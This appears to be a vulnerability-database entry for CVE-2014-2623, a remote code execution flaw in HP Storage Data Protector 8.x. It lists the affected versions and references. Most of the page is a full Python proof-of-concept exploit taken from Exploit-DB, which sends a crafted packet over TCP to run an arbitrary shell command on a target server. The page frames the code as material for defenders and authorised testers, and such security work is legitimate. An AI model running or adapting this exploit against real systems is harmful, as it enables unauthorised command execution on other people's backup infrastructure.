CVE-2014-2623
Description
Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
HP Data Protector 8.x - Remote Command Execution
```python
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
import socket
import struct
import sys

def exploit(host, port, command):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        print "[+] Target connected."

        OFFSET_DEC_START = 133
        OFFSET_DEC = (OFFSET_DEC_START + len(command))
        # print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
        # print "len(command)" + str(len(command))
        # print "OFFSET_DEC" + str(OFFSET_DEC)
        OFFSET_HEX = "%x" % OFFSET_DEC
        # print "OFFSET_HEX" + str(OFFSET_HEX)
        OFFSET_USE = chr(OFFSET_DEC)
        # print "Command Length: " + str(len(command))
        PACKET_DATA = "\x00\x00\x00"+\
        OFFSET_USE+\
        "\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
        "\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
        "\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
        "\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
        "\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
        "\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
        "\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
        "\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
        " %s\x00" %command

        # Send payload to target
        print "[+] Sending PACKET_DATA"
        sock.sendall(PACKET_DATA)

        # Parse the response back
        print "[*] Result:"
        while True:
            response = sock.recv(2048)
            if not response: break
            print response

    except Exception as ex:
        print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
        exit(-3)
    sock.close()

if __name__ == "__main__":
    try:
        target = sys.argv[1]
        port = int(sys.argv[2])
        command = sys.argv[3]
        exploit(target, port, command)
    except IndexError:
        print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
        exit(0)
```
HP Data Protector 8.10 - Remote Command Execution (Metasploit)
HP Data Protector Manager 8.10 - Remote Command Execution
Metasploit modules
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| hp | storage_data_protector | 8.0 | |
| hp | storage_data_protector | 8.10 | |
References
- http://packetstormsecurity.com/files/130658/HP-Data-Protector-8.10-Remote-Command-Execution.html
- http://www.exploit-db.com/exploits/34066/
- http://www.exploit-db.com/exploits/35961
- http://www.exploit-db.com/exploits/36304
- http://www.osvdb.org/109069
- http://www.securitytracker.com/id/1030583
- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04373818